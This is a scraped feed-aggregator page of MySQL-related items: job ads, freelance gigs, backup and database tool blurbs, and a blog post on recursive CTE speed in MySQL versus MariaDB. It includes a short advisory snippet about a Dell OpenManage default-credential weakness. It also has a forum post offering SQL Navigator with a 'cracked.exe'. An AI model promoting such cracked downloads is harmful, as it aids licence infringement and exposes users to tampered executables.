identity . gender expression
          Stripe expert for setting up and implementing Stripe connect with grouped transactions on a marketplace      Cache   Translate Page      
We are in the process of building up a marketplace, and has come to the payment. We are choosing to go with Stripe, and have an idea of how we want this to work, however we lack the inhouse experience to set this up properly... (Budget: $10 - $50 USD, Jobs: .NET, API, eCommerce, MySQL, Stripe)
          Dell OpenManage Network Manager 6.2.0.51 SP3 Privilege Escalation      Cache   Translate Page      
Dell OpenManage Network Manager exposes a MySQL listener that can be accessed with default credentials. This MySQL service is running as the root user, so an attacker can exploit this configuration to ... - Source: packetstormsecurity.com
          SENIOR SOFTWARE ENGINEER – WEB DEVELOPER - West Virginia Radio Corporation - Morgantown, WV      Cache   Translate Page      
PHP, Apache, MySQL, WordPress, JavaScript, jQuery, JSON, REST, XML, RSS, HTML5, CSS3, Objective-C, Java, HLS Streaming, CDNs, Load Balancing....
From West Virginia Radio Corporation - Tue, 18 Sep 2018 10:09:25 GMT - View all Morgantown, WV jobs
          SENIOR SOFTWARE ENGINEER – WEB DEVELOPER - West Virginia Radio Corporation - Morgantown, WV      Cache   Translate Page      
PHP, Apache, MySQL, WordPress, JavaScript, jQuery, JSON, REST, XML, RSS, HTML5, CSS3, Objective-C, Java, HLS Streaming, CDNs, Load Balancing....
From West Virginia Radio Corporation - Tue, 18 Sep 2018 10:09:25 GMT - View all Morgantown, WV jobs
          SENIOR SOFTWARE ENGINEER – WEB DEVELOPER - West Virginia Radio Corporation - Morgantown, WV      Cache   Translate Page      
PHP, Apache, MySQL, WordPress, JavaScript, jQuery, JSON, REST, XML, RSS, HTML5, CSS3, Objective-C, Java, HLS Streaming, CDNs, Load Balancing....
From West Virginia Radio Corporation - Tue, 18 Sep 2018 10:09:25 GMT - View all Morgantown, WV jobs
          请教:mysql表同步问题      Cache   Translate Page      
在做mysql主从同步时,我们要求的是只同步2个数据库的2张表(如:A、B表),其它的表不同步;我现在按常规操作,关键配置如下: 这样确实可以做到表的同步,但有一种情况是有问题的:那就是在主库新建个表名为X的表,插入一些数据,然后将X表重命名为B表,这时候从库会报错同步不了B表 请问大大们 ...
          magento 2 edits and api      Cache   Translate Page      
hello i moved my site from opencart to magento 2 and i faced some issue and bugs i want to fix it and i want to install extension and API also (Budget: $30 - $250 USD, Jobs: eCommerce, Magento, MySQL, PHP)
          PHP programmer from Kerala      Cache   Translate Page      
Looking for a senior PHP developer from Kerala who can work from home (Budget: $8 - $15 USD, Jobs: HTML, Javascript, MySQL, PHP, Software Architecture)
          PHP developers from Pakistan      Cache   Translate Page      
Need Php web developers for a software (Budget: $30 - $250 USD, Jobs: Graphic Design, HTML, MySQL, PHP, Website Design)
          SENIOR SOFTWARE ENGINEER – WEB DEVELOPER - West Virginia Radio Corporation - Morgantown, WV      Cache   Translate Page      
PHP, Apache, MySQL, WordPress, JavaScript, jQuery, JSON, REST, XML, RSS, HTML5, CSS3, Objective-C, Java, HLS Streaming, CDNs, Load Balancing....
From West Virginia Radio Corporation - Tue, 18 Sep 2018 10:09:25 GMT - View all Morgantown, WV jobs
          Разработчик С#      Cache   Translate Page      

На постоянную работу в Алматы требуется разработчик.

Опыт работы от года.

Вилка з/п от 150000 тг до 300000 тг на руки.

 

Обязанности:

  • Разработка программного обеспечения;

  • Техническое сопровождение системы;

  • Написание сопровождающей технической документации;

  • Веб технологии: PHP, Java (JSP, Servlet, Spring), знание протокола http. Работа с веб сервисами (SOAP). Приветствуется знание JS, Jquery, CSS;

  • Работа с технической документацией (API, Руководство администратора, развертывание различных систем по документации и т.д.), в том числе на английском языке;

  • Тестирование, настройка ПО;

  • Выезд к Заказчику, работа с пользователями системы;

  • Командная работа в разработке ПО.

Требования:

  • Знание C# WindowsFormApplication, а также приветствуется знание C++, Delphi;
  • Знание сетевых технологий;
  • Знание SQL, Любые СУБД (MSSQL, MySQL, PostgreSQL, Oracle);
  • Умение разбирать документации по интеграции с различными сервисами;
  • Знание английского на уровне чтения технической литературы;
  • Стрессоустойчивость, коммуникабельность;
  • Желание развиваться профессионально;
  • Обучаемость;
  • Умение работать в команде.

          Technical Architect - Data Solutions - CDW - Milwaukee, WI      Cache   Translate Page      
Experience with Microsoft SQL, MySQL, Oracle, and other database technologies. Predictive analytics, Machine Learning and/or AI skills will be a plus....
From CDW - Sat, 03 Nov 2018 06:11:29 GMT - View all Milwaukee, WI jobs
          Technical Architect - Data Solutions - CDW - Madison, WI      Cache   Translate Page      
Experience with Microsoft SQL, MySQL, Oracle, and other database technologies. Predictive analytics, Machine Learning and/or AI skills will be a plus....
From CDW - Sat, 03 Nov 2018 06:11:29 GMT - View all Madison, WI jobs
          Software Engineer - Microsoft - Bellevue, WA      Cache   Translate Page      
Presentation, Application, Business, and Data layers) preferred. Database development experience with technologies like MS SQL, MySQL, or Oracle....
From Microsoft - Sun, 28 Oct 2018 21:34:20 GMT - View all Bellevue, WA jobs
          Electronic Signature Ecuador task      Cache   Translate Page      
Hello PLEASE BID ONLY EXPERT XAdEBES Electronic Signature for Ecuador SRI. In Php Zend Framework 3. Sending and receiving receipt to the WS of the SRI the information is in Spanish ... you have to follow... (Budget: $200 - $255 CAD, Jobs: MySQL, PHP, Software Architecture, XML)
          RingCentral api help      Cache   Translate Page      
Hi i need help with setting up ring central api and answer to this question: devcommunity.ringcentral.com/ringcentraldev/topics/send-request-to-our-webpage-when-we-start-and-end-a-call developer.ringcentral.com/api-reference... (Budget: $10 - $30 USD, Jobs: Javascript, MySQL, PHP, Software Architecture, XML)
          Consultor Senior - Administrador de Plataformas Linux - IT Consultores S.A.S - Medellín, Antioquia, Colombia      Cache   Translate Page      
Empresa especializada en Consultoría en TI requiere Requisitos: Profesional en Ingeniería de Sistemas o carreras afines. Debe acreditar mínimo de 3 años de experiencia profesional desplegando infraestructura de servidores para el soporte de aplicaciones de misión crítica y/o como administrador de plataformas Linux. Debe contar con conocimientos intermedios en: Linux, redes, infraestructuras OnPremise y de Nube. Deseable conocimientos en administración de base de datos MySQL. ...
          CockroachDB 2.1.0      Cache   Translate Page      
Het team achter CockroachDB heeft versie 2.1.0 uitgebracht. Dit is een opensourcedatabase die uitermate geschikt is voor cloudomgevingen en die verschillende opties voor het opvangen van problemen biedt, dankzij de verspreide opzet. Voor meer informatie verwijzen we naar deze pagina, waar de meest gestelde vragen worden beantwoord. De lijst met veranderingen ziet er als volgt uit: What's New in v2.1.0 With the release of CockroachDB v2.1, we?ve made it easier than ever to migrate from MySQL and Postgres, improved our scalability on transactional workloads by 5x, enhanced our troubleshooting workflows in the Admin UI, and launched a managed offering to help teams deploy low-latency, multi-region clusters with minimal operator overhead. Enterprise Features These new features require an enterprise license.
          Application Enhancement      Cache   Translate Page      
Need freelancer should have phenomenal knowledge in CSS, PHP Zend Framework to enhance the existing product. Have to enhance HRMS Application on general look and feels. Kindly reply to me if you are interested to involve... (Budget: ₹12500 - ₹37500 INR, Jobs: Bootstrap, CSS, HTML, MySQL, PHP)
          Custom unit addition based on given extension      Cache   Translate Page      
Based on a extension I need a unit addition parameter User specifies that product A has to have 5 additions each, so when the client orders it he will only be able to make an order as in 5 , 10, 15 units... (Budget: $30 - $250 USD, Jobs: C# Programming, Javascript, MySQL, PHP, Software Architecture)
          Complement the Guest House Bookings website -- 2      Cache   Translate Page      
We have guest houses website for booking with 2 options. one for the traditional booking, user book a specific guest house. the second is for booking a package with its included services. we have admin control panel... (Budget: $250 - $750 USD, Jobs: Graphic Design, HTML, MySQL, PHP, Website Design)
          Application Enhancement      Cache   Translate Page      
Need freelancer should have phenomenal knowledge in CSS, PHP Zend Framework to enhance the existing product. Have to enhance HRMS Application on general look and feels. Kindly reply to me if you are interested to involve... (Budget: ₹12500 - ₹37500 INR, Jobs: Bootstrap, CSS, HTML, MySQL, PHP)
          Custom unit addition based on given extension      Cache   Translate Page      
Based on a extension I need a unit addition parameter User specifies that product A has to have 5 additions each, so when the client orders it he will only be able to make an order as in 5 , 10, 15 units... (Budget: $30 - $250 USD, Jobs: C# Programming, Javascript, MySQL, PHP, Software Architecture)
          Complement the Guest House Bookings website -- 2      Cache   Translate Page      
We have guest houses website for booking with 2 options. one for the traditional booking, user book a specific guest house. the second is for booking a package with its included services. we have admin control panel... (Budget: $250 - $750 USD, Jobs: Graphic Design, HTML, MySQL, PHP, Website Design)
          SENIOR SOFTWARE ENGINEER – WEB DEVELOPER - West Virginia Radio Corporation - Morgantown, WV      Cache   Translate Page      
PHP, Apache, MySQL, WordPress, JavaScript, jQuery, JSON, REST, XML, RSS, HTML5, CSS3, Objective-C, Java, HLS Streaming, CDNs, Load Balancing....
From West Virginia Radio Corporation - Tue, 18 Sep 2018 10:09:25 GMT - View all Morgantown, WV jobs
          Application Enhancement      Cache   Translate Page      
Need freelancer should have phenomenal knowledge in CSS, PHP Zend Framework to enhance the existing product. Have to enhance HRMS Application on general look and feels. Kindly reply to me if you are interested to involve... (Budget: ₹12500 - ₹37500 INR, Jobs: Bootstrap, CSS, HTML, MySQL, PHP)
          Custom unit addition based on given extension      Cache   Translate Page      
Based on a extension I need a unit addition parameter User specifies that product A has to have 5 additions each, so when the client orders it he will only be able to make an order as in 5 , 10, 15 units... (Budget: $30 - $250 USD, Jobs: C# Programming, Javascript, MySQL, PHP, Software Architecture)
          Complement the Guest House Bookings website -- 2      Cache   Translate Page      
We have guest houses website for booking with 2 options. one for the traditional booking, user book a specific guest house. the second is for booking a package with its included services. we have admin control panel... (Budget: $250 - $750 USD, Jobs: Graphic Design, HTML, MySQL, PHP, Website Design)
          Junior Database Administrator - University of Saskatchewan - Saskatoon, SK      Cache   Translate Page      
PostgreSQL, MySQL, SQL Server, Oracle. The salary range, based on 1.0 FTE, is CAD $48,334.00 - 75,523.00 per annum (Information Technology/Phase 1).... $48,334 - $75,523 a year
From University of Saskatchewan - Wed, 31 Oct 2018 00:18:52 GMT - View all Saskatoon, SK jobs
          What's the acceptable ping for external mySQL Database ?      Cache   Translate Page      
as of right now I am using Google App Engine. The problem is Google Cloud SQL is very expensive. So, I am offloading mysql server into digital ocean. The reason I am using Google App Engine, is becaus ... - Source: www.lowendtalk.com
          Développeur Back-End PHP / Back-End Developer - ADFAB - Montréal, QC      Cache   Translate Page      
En BD, nous restons classiques avec MySQL mais nous tentons des choses avec Mongo DB, ElasticSearch... ADFAB est un studio de développement.... $45,000 - $65,000 a year
From Indeed - Wed, 24 Oct 2018 11:05:13 GMT - View all Montréal, QC jobs
          fix wp-pro-quiz wordpress plugin with some customization      Cache   Translate Page      
the description of the work is in the attachment. would be some fixes and customization of wp-pro-quiz. excuse me for my english... I hear your offers... thank you in advance. I´m flexible and hear your... (Budget: €30 - €250 EUR, Jobs: CSS, HTML, MySQL, PHP, WordPress)
          SENIOR SOFTWARE ENGINEER – WEB DEVELOPER - West Virginia Radio Corporation - Morgantown, WV      Cache   Translate Page      
PHP, Apache, MySQL, WordPress, JavaScript, jQuery, JSON, REST, XML, RSS, HTML5, CSS3, Objective-C, Java, HLS Streaming, CDNs, Load Balancing....
From West Virginia Radio Corporation - Tue, 18 Sep 2018 10:09:25 GMT - View all Morgantown, WV jobs
          SENIOR SOFTWARE ENGINEER – WEB DEVELOPER - West Virginia Radio Corporation - Morgantown, WV      Cache   Translate Page      
PHP, Apache, MySQL, WordPress, JavaScript, jQuery, JSON, REST, XML, RSS, HTML5, CSS3, Objective-C, Java, HLS Streaming, CDNs, Load Balancing....
From West Virginia Radio Corporation - Tue, 18 Sep 2018 10:09:25 GMT - View all Morgantown, WV jobs
          Adriod Developer - vikas Global Solutions Ltd - Madhavanpark, Karnataka      Cache   Translate Page      
Android Application Development, Android SDK’s, API, HTML,CSS, MYSQL. Android Application Development. Vikas Global Solutions Ltd....
From Indeed - Mon, 10 Sep 2018 05:26:38 GMT - View all Madhavanpark, Karnataka jobs
          Common Table Expressions: A Shocking Difference Between MySQL and MariaDB      Cache   Translate Page      
Common Table Expressions (CTEs) are a very useful tool and frankly a big improvement on sub-queries.  But there are differences in how they are implemented in MySQL and MariaDB.  That  is not too surprising since the code fork many years ago. Different engineers implementing the same idea will have different approaches (and sometimes results). But differences in implementation are often important and, in this case, shockingly different.Jesper Wisborg Krogh at Oracle OpenWorld and CodeOne gave a series of presentations and hands on labs that were excellent. He is an amazing Support Engineer and a great presenter of material at conferences.  In the lab for Common Table Expressions he did point out to me an interesting problem in MariaDB's implementation of CTEs. The Problem In a Nutshell On the PostgreSQL Wiki, there is aan SQL query (requires PostgreSQL 8.4 or MySQL 8.0) that produces an ASCII-art image of the Mandelbrot set written entirely in SQL 2008 conforming SQL.-- Based on: https://wiki.postgresql.org/wiki/Mandelbrot_setWITH RECURSIVE x(i) AS (    SELECT CAST(0 AS DECIMAL(13, 10))     UNION ALL    SELECT i + 1      FROM x     WHERE i < 101),Z(Ix, Iy, Cx, Cy, X, Y, I) AS (    SELECT Ix, Iy, X, Y, X, Y, 0      FROM (SELECT CAST(-2.2 + 0.031 * i AS DECIMAL(13, 10)) AS X,                  i AS Ix FROM x) AS xgen           CROSS JOIN (               SELECT CAST(-1.5 + 0.031 * i AS DECIMAL(13, 10)) AS Y,                      i AS iY FROM x           ) AS ygen    UNION ALL    SELECT Ix, Iy, Cx, Cy,           CAST(X * X - Y * Y + Cx AS DECIMAL(13, 10)) AS X,           CAST(Y * X * 2 + Cy AS DECIMAL(13, 10)), I + 1      FROM Z     WHERE X * X + Y * Y < 16.0           AND I < 27),Zt (Ix, Iy, I) AS (    SELECT Ix, Iy, MAX(I) AS I      FROM Z     GROUP BY Iy, Ix     ORDER BY Iy, Ix)SELECT GROUP_CONCAT(           SUBSTRING(               ' .,,,-----++++%%%%@@@@#### ',               GREATEST(I, 1),               1           ) ORDER BY Ix SEPARATOR ''       ) AS 'Mandelbrot Set'  FROM Zt GROUP BY Iy ORDER BY Iy; The code is best run on the new MySQL Shell or MySQL Workbench but works well on the old MySQL shell but with desegregated output. An abbreviated image of  the Mandelbot SQL output (See above for listing) , truncated for size. Produced with the new MySQL Shell (mysqlsh) on MySQL 8.0.13  But then Jesper mention he had tested the SQL the night before the lab and it runs quickly on MySQL - 0.7445 seconds on my Windows laptop. The Mandelbrot SQL code ran in 0.74445 seconds on MySQL 8.0.13 But not on MariaDB.  Jesper said he ran the same code on MariaDB 10.3 but killed it after fifteen minutes.  It was late and he had to get up early to get to San Francisco. Double Check With a fresh install of Fedora 29 and MariaDB 10.3.10, I ran the Mandelbrot SQL code.  And I waited for the result.  After an hour I went to lunch. But the query was still running when I returned.  I went on to other work an occasionally checking back and running SHOW PROCESSLIST  from time to time to make sure it had not died.  But after two hours I hit control-C as I had other tasks for that system.  There are some interesting Recursive CTE problems listed on Jira,MariaDB.org but nothing obviously relevant. But I was able to confirm that MySQL's implementation of Recursive CTEs works well but I can not say that about MariaDB's implementation. 
          Iperius Backup Full 5.8.1      Cache   Translate Page      
Iperius Backup Full 5.8.1

Iperius Backup - программа резервного копирования, восстановления и синхронизации данных, совместимая со всеми платформами Windows. Позволяет проводить автоматическое резервное копирование на многие носители информации: внешние диски USB, носители RDX, NAS, ленточные накопители LTO/DAT, удаленные компьютеры и сайты по FTP, Облачное хранилище. Iperius Backup включает в себя создание образа диска, резервное копирование баз данных Microsoft SQL Server, MySQL, PostgreSQL, Oracle Database и Аварийное Восстановление.
          Update phpmyadmin on ubuntu 18.x      Cache   Translate Page      
I need help updating phpmyadmin for 4.6.6 to the latest version on ubuntu 18.x. i can grant ssh access. this work is not urgent (Budget: $10 - $30 USD, Jobs: Apache, Linux, MySQL, System Admin, Ubuntu)
          upload a wordpress site from dev to live server      Cache   Translate Page      
upload a wordpress site from dev to live server and database and update db links to new domain (Budget: €30 - €250 EUR, Jobs: HTML, MySQL, PHP, Website Design, WordPress)
          migrating my script from TROPO to TWILO      Cache   Translate Page      
Need a good XML PHP TWILO programmer to handle this asap. want to convert my script in tropo TO twilo please confirm if possible. (Budget: $10 - $30 USD, Jobs: Javascript, MySQL, PHP, Software Architecture, XML)
          Soporte sobre cms newscoop      Cache   Translate Page      
Requerimos una persona experta y conocedora del cms newscoop para hacer una revisión general y determinar por que no se están publicando las noticias correctamente. Preferiblemente personas latinas. (Budget: $30 - $250 USD, Jobs: Article Writing, CMS, MySQL, PHP, Website Design)
          Php Developer Urgent Hirings      Cache   Translate Page      
, RSS Feed, SVN Server, Flash Cpanel, MySQL, Dreamweaver, Analytic
          Développeur .Net H/F      Cache   Translate Page      
Au sein d'un cabinet de conseil d'envergure et reconnu sur son marché, vous intégrez l'équipe du Département Informatique. En tant que Développeur .Net, vos principales missions seront les suivantes :      * Développer les applications internes à l'entreprise, en cohérence avec les différents besoins métiers (extranet client, outils internes micro-services, etc.),     * Maintenir en condition les applications existantes et les faire évoluer,     * Maîtriser et intervenir sur les bases de données existantes (Oracle, MySQL),     * Participer aux projets de développement Datawarehouse (Talend),     * Former les utilisateurs sur les outils métiers et les applications réalisées. Cette description prend en compte les principales responsabilités ; elle n'est pas limitative.
          SENIOR SOFTWARE ENGINEER – WEB DEVELOPER - West Virginia Radio Corporation - Morgantown, WV      Cache   Translate Page      
PHP, Apache, MySQL, WordPress, JavaScript, jQuery, JSON, REST, XML, RSS, HTML5, CSS3, Objective-C, Java, HLS Streaming, CDNs, Load Balancing....
From West Virginia Radio Corporation - Tue, 18 Sep 2018 10:09:25 GMT - View all Morgantown, WV jobs
          SENIOR SOFTWARE ENGINEER – WEB DEVELOPER - West Virginia Radio Corporation - Morgantown, WV      Cache   Translate Page      
PHP, Apache, MySQL, WordPress, JavaScript, jQuery, JSON, REST, XML, RSS, HTML5, CSS3, Objective-C, Java, HLS Streaming, CDNs, Load Balancing....
From West Virginia Radio Corporation - Tue, 18 Sep 2018 10:09:25 GMT - View all Morgantown, WV jobs
          mysqltools-python 2.18.11.06      Cache   Translate Page      
none
          Coda 2.6.1 (2017)      Cache   Translate Page      
Coda 2.6.1 - редактор для веб-разработчиков. Сделайте свой код красивым вместе с программой Coda! Текстовый редактор, передача файлов, SVN, CSS-редактор, терминал, доступ к книгам по разработке и многое другое. Полностью насчитывается порядка ста функций, как например: встроенный редактор MySQL, живые подсказки кода, в CSS редактор встроены всплывающие палитры цветов и внедрен режим просмотра результата в реальном времени, "умные" вкладки, улучшенное управление сайтом, и многое другое.
          Php Developer Urgent Hirings      Cache   Translate Page      
, RSS Feed, SVN Server, Flash Cpanel, MySQL, Dreamweaver, Analytic
          SENIOR SOFTWARE ENGINEER – WEB DEVELOPER - West Virginia Radio Corporation - Morgantown, WV      Cache   Translate Page      
PHP, Apache, MySQL, WordPress, JavaScript, jQuery, JSON, REST, XML, RSS, HTML5, CSS3, Objective-C, Java, HLS Streaming, CDNs, Load Balancing....
From West Virginia Radio Corporation - Tue, 18 Sep 2018 10:09:25 GMT - View all Morgantown, WV jobs
          Handy Backup Small Server 7.18.0      Cache   Translate Page      
Mehr Info sehen

Autor: Novosoft Handy Backup
Akte Größe: 164.30 Mb
Datum freigeben: 2018-11-07
Screenshot: Screenshot
Beschreibung: Handy Backup Small Server is a full-featured backup solution for Windows Server 2016/2012/2008. Provides backup of files, HDDs, MS SQL, MS Exchange, MySQL, PostgreSQL, Oracle to local and external drives, FTP/SFTP/FTPS, WebDAV, or cloud storages.
          Handy Backup Small Server 7.18.0      Cache   Translate Page      
Mehr Info sehen

Autor: Novosoft Handy Backup
Akte Größe: 164.30 Mb
Datum freigeben: 2018-11-07
Screenshot: Screenshot
Beschreibung: Handy Backup Small Server is a full-featured backup solution for Windows Server 2016/2012/2008. Provides backup of files, HDDs, MS SQL, MS Exchange, MySQL, PostgreSQL, Oracle to local and external drives, FTP/SFTP/FTPS, WebDAV, or cloud storages.
          DBeaver 5.2.4      Cache   Translate Page      
DBeaver is a universal database manager and SQL Client. It supports MySQL, PostgreSQL, Oracle, DB2, MSSQL, Sybase, Mimer, HSQLDB, Derby, and any database that has a JDBC driver.
          Complement the Guest House Bookings website -- 3      Cache   Translate Page      
We have guest houses website for booking with 2 options. one for the traditional booking, user book a specific guest house. the second is for booking a package with its included services. we have admin control panel... (Budget: $250 - $750 USD, Jobs: Graphic Design, HTML, MySQL, PHP, Website Design)
          Completely clean up 20 hacked wordpress installations      Cache   Translate Page      
I have multiple wordpress installations installed on the same server - around 20. They have all been a victim of being hacked and with the same method. They have the following code in the header of the *.php files (see attatched hacked_code.txt)... (Budget: $250 - $750 USD, Jobs: HTML, MySQL, PHP, Web Security, WordPress)
          Complement the Guest House Bookings website -- 3      Cache   Translate Page      
We have guest houses website for booking with 2 options. one for the traditional booking, user book a specific guest house. the second is for booking a package with its included services. we have admin control panel... (Budget: $250 - $750 USD, Jobs: Graphic Design, HTML, MySQL, PHP, Website Design)
          Completely clean up 20 hacked wordpress installations      Cache   Translate Page      
I have multiple wordpress installations installed on the same server - around 20. They have all been a victim of being hacked and with the same method. They have the following code in the header of the *.php files (see attatched hacked_code.txt)... (Budget: $250 - $750 USD, Jobs: HTML, MySQL, PHP, Web Security, WordPress)
          Drupal Developer      Cache   Translate Page      
NC-Raleigh, job summary: An exciting digital marketing agency is looking for a driven (direct hire) developer with w orking knowledge of Drupal, PHP, JavaScript, and MySQL to join their team in Raleigh, NC. This role is great if you want to be a part of building products that deliver meaningful results and refreshing user experiences. location: Raleigh, North Carolina job type: Permanent work hours: 8 to 5 ed
          SENIOR SOFTWARE ENGINEER – WEB DEVELOPER - West Virginia Radio Corporation - Morgantown, WV      Cache   Translate Page      
PHP, Apache, MySQL, WordPress, JavaScript, jQuery, JSON, REST, XML, RSS, HTML5, CSS3, Objective-C, Java, HLS Streaming, CDNs, Load Balancing....
From West Virginia Radio Corporation - Tue, 18 Sep 2018 10:09:25 GMT - View all Morgantown, WV jobs
          Membership Website Using Inbuilt Plugin of any CMS/Framework with Stripe Payment Method      Cache   Translate Page      
Hi We are looking forward to build a membership website where we can show our products we are selling (we sell access to expensive websites so everything is digital infact we just give users the username... (Budget: $15 - $25 USD, Jobs: MySQL, PHP, Plugin, Website Design, WordPress)
          fix PHP Skript      Cache   Translate Page      
The skript is about a bot, autofill form (bot) Sync)( CronJob) for a website called flohmarkt.at to post our ad automatically. It worked for 3 Month without any troubles. However, now The PHP text is probably damanged... (Budget: €8 - €30 EUR, Jobs: HTML, Javascript, MySQL, PHP)
          SENIOR SOFTWARE ENGINEER – WEB DEVELOPER - West Virginia Radio Corporation - Morgantown, WV      Cache   Translate Page      
PHP, Apache, MySQL, WordPress, JavaScript, jQuery, JSON, REST, XML, RSS, HTML5, CSS3, Objective-C, Java, HLS Streaming, CDNs, Load Balancing....
From West Virginia Radio Corporation - Tue, 18 Sep 2018 10:09:25 GMT - View all Morgantown, WV jobs
          SENIOR SOFTWARE ENGINEER – WEB DEVELOPER - West Virginia Radio Corporation - Morgantown, WV      Cache   Translate Page      
PHP, Apache, MySQL, WordPress, JavaScript, jQuery, JSON, REST, XML, RSS, HTML5, CSS3, Objective-C, Java, HLS Streaming, CDNs, Load Balancing....
From West Virginia Radio Corporation - Tue, 18 Sep 2018 10:09:25 GMT - View all Morgantown, WV jobs
          Développeur Back-End PHP / Back-End Developer - ADFAB - Montréal, QC      Cache   Translate Page      
En BD, nous restons classiques avec MySQL mais nous tentons des choses avec Mongo DB, ElasticSearch... ADFAB est un studio de développement.... $45,000 - $65,000 a year
From Indeed - Wed, 24 Oct 2018 11:05:13 GMT - View all Montréal, QC jobs
          Développeur Front (JS/HTML/CSS) / Front End Developer - ADFAB - Montréal, QC      Cache   Translate Page      
En BD, nous restons classiques avec MySQL mais nous tentons des choses avec Mongo DB, ElasticSearch... ADFAB est un studio de développement.... $45,000 - $65,000 a year
From Indeed - Wed, 24 Oct 2018 11:00:16 GMT - View all Montréal, QC jobs
          PHP & MySQL For Dummies – Janet Valade – 3rd Edition      Cache   Translate Page      

Solutions Manual

Build an online catalog and a members-only site. Everything you need to know to create a dynamic PHP and MySQL [...]

The post PHP & MySQL For Dummies – Janet Valade – 3rd Edition appeared first on Solutions Manual.


          Engineer I - Software - DISH Network - Cheyenne, WY      Cache   Translate Page      
MySQL, SQL Server, Oracle, PostgreSQL. DISH is a Fortune 200 company with more than $15 billion in annual revenue that continues to redefine the communications...
From DISH - Sat, 27 Oct 2018 12:43:20 GMT - View all Cheyenne, WY jobs
          Software Engineer w/ Active DOD Secret Clearance (Contract) - Preferred Systems Solutions, Inc. - Cheyenne, WY      Cache   Translate Page      
Experience with MySQL, Microsoft SQL Server, and Oracle databases. Experts Engaged in Delivering Their Best - This is the cornerstone of our service-oriented...
From Preferred Systems Solutions, Inc. - Tue, 25 Sep 2018 20:46:05 GMT - View all Cheyenne, WY jobs
          Securing a PHP website      Cache   Translate Page      
Hello, I have a ready prepared content and websites created by PHP and it seems there are so many vulnerabilities associated with it. I would need someone to scan those vulnerabilities and apply recommended fixes to them... (Budget: $30 - $250 USD, Jobs: HTML, MySQL, PHP, Web Security, Website Design)
          Technical Architect (Salesforce experience required) Cheyenne - Silverline Jobs - Cheyenne, WY      Cache   Translate Page      
Competency with Microsoft SQL Server, MYSQL, postgreSQL or Oracle. Do you want to be part of a fast paced environment, supporting the growth of cutting edge...
From Silverline Jobs - Sun, 29 Jul 2018 06:18:46 GMT - View all Cheyenne, WY jobs
          Senior Data Engineer - DISH Network - Cheyenne, WY      Cache   Translate Page      
MySQL, MS SQL, Oracle, or other professional database system. DISH is a Fortune 200 company with more than $15 billion in annual revenue that continues to...
From DISH - Wed, 15 Aug 2018 05:17:45 GMT - View all Cheyenne, WY jobs
          Iperius Backup Full 5.8.1 ML/RUS      Cache   Translate Page      
Iperius Backup - программа резервного копирования, восстановления и синхронизации данных, совместимая со всеми платформами Windows. Позволяет проводить автоматическое резервное копирование на многие носители информации: внешние диски USB, носители RDX, NAS, ленточные накопители LTO/DAT, удаленные компьютеры и сайты по FTP, Облачное хранилище. Iperius Backup включает в себя создание образа диска, резервное копирование баз данных Microsoft SQL Server, MySQL, PostgreSQL, Oracle Database и Аварийное Восстановление.
          SoftoRooM -> SQL Navigator 7.5      Cache   Translate Page      
PRYANIK:
Твой софтовый форум: SoftoRooM

Quest SQL Navigator XPert Edition

Твой софтовый форум

описание (ru) SQL Navigator программное обеспечение, которое помогает разрабатывать высококачественные приложения, упрощает процесс написания, редактирования и обслуживания объектов базы данных.

Бесплатно скачав Quest SQL Navigator, вы сможете увеличить отдачу от своих СУБД Oracle, поддерживать определенные уровни производительности приложения/базы данных и обеспечивать доступ разработчикам или администраторам баз данных к платформам баз данных, отличающихся от Oracle, для выполнения запросов, просмотра и составления отчетов, выполнять правила ведения бизнеса для гарантирования правильности данных и соответствия бизнес-политикам.
SQL Navigator key обеспечивает настройку SQL для предотвращения влияния проблем производительности на работу пользователей приложений.

Основные возможности SQL Navigator:
▲ Точное написание, отладка и настройка программного кода.
▲ Гибкость выполнения многих разработок и задач администрирования при помощи одного инструмента.
▲ Возможность легко переходить от одной задачи к другой.
▲ Эффективность при выполнении ежедневных задач.
▲ Предоставление отчетности с обеспечением создания количественных данных и документации.
▲ Возможность работы в группах.
▲ Уменьшение общих расходов на разработку и администрирование путем автоматизации задач.
▲ Быстрое подключение к Oracle, SQL Server, MS Access, Sybase и MySQL для выполнения запросов и создания отчетов.
▲ Доступ к экспертизе Oracle через различные сообщества пользователей Toad.
▲ Уменьшение общих расходов на разработку и администрирование путем автоматизации задач.
▲ Последовательный, постоянный и измеримый процесс управления общими проектами разработки баз данных.
▲ Соответствие требованиям соглашения об уровне предоставляемых услуг (SLA).
▲ Включает продукт SQL Optimization для автоматического переписывания SQL кода, который мог бы потенциально сильно ухудшить производительность работы.
▲ Обнаруживает уязвимые участки в коде и обеспечивает возможность просматриваемость логическое покрытие PL/SQL кодом.


description (en) SQL Navigator SQL Navigator for Oracle helps you write better code faster

Deliver high-quality applications faster than ever by being able to write, edit and maintain database objects through automation and an intuitive graphical interface. Experience our powerful SQL software tool that optimizes performance issues before they impact production and end users.

Choose from four editions : SQL Navigator Base Edition, SQL Navigator Professional Edition, SQL Navigator Xpert Edition and SQL Navigator crack Developer Edition.
(supports Oracle 12c and Windows 8)

Features
Code Xpert
Determines software quality, abbreviates test cycles, reduces error rates, alleviates maintenance efforts, discovers software changes, and identifies high-risk code through industry-leading metrics and test coverage techniques
Team coding
Helps you maintain code integrity and integration with version control
ER diagram
Enables you to model a table, and view the dependencies and joins to other tables
Code road map
Highlights the complex interdependencies of your PL/SQL code within the database
SQL Optimizer for Oracle
This Oracle database development solution delivers integrated and enhanced SQL optimization functionality in the SQL Navigator Xpert Edition crack, and provides intelligent recommendations, SQL scanning and index optimization.


Interface languages: En
OS: Windows 10/8 (32bit-64bit)
Homepage: www.quest.com
скачать бесплатно / free download SQL Navigator XPert Edition 7.5 + crack (cracked.exe) ~ 90 Mb

SQL Navigator XPert Edition 7.5.0.82 x86
Скрытый текст!
Подробности на форуме...

SQL Navigator XPert Edition 7.5.0.82 x64
Скрытый текст!
Подробности на форуме...

SQL Navigator 7.5
источник: www.softoroom.net

          SENIOR SOFTWARE ENGINEER – WEB DEVELOPER - West Virginia Radio Corporation - Morgantown, WV      Cache   Translate Page      
PHP, Apache, MySQL, WordPress, JavaScript, jQuery, JSON, REST, XML, RSS, HTML5, CSS3, Objective-C, Java, HLS Streaming, CDNs, Load Balancing....
From West Virginia Radio Corporation - Tue, 18 Sep 2018 10:09:25 GMT - View all Morgantown, WV jobs
          PHP Developer      Cache   Translate Page      
Desired Applicant Profile: Must be proficient in PHP, MySQL, CSS, HTML, Javascript, AJAX, XML
          Php developer      Cache   Translate Page      
Build, maintain, and optimize PHP web applications. MySQL with strong query knowledge (Mandatory
          $24.99 - For sale: Php And Mysql by Larry Ullman - $24 @stanford.edu      Cache   Translate Page      
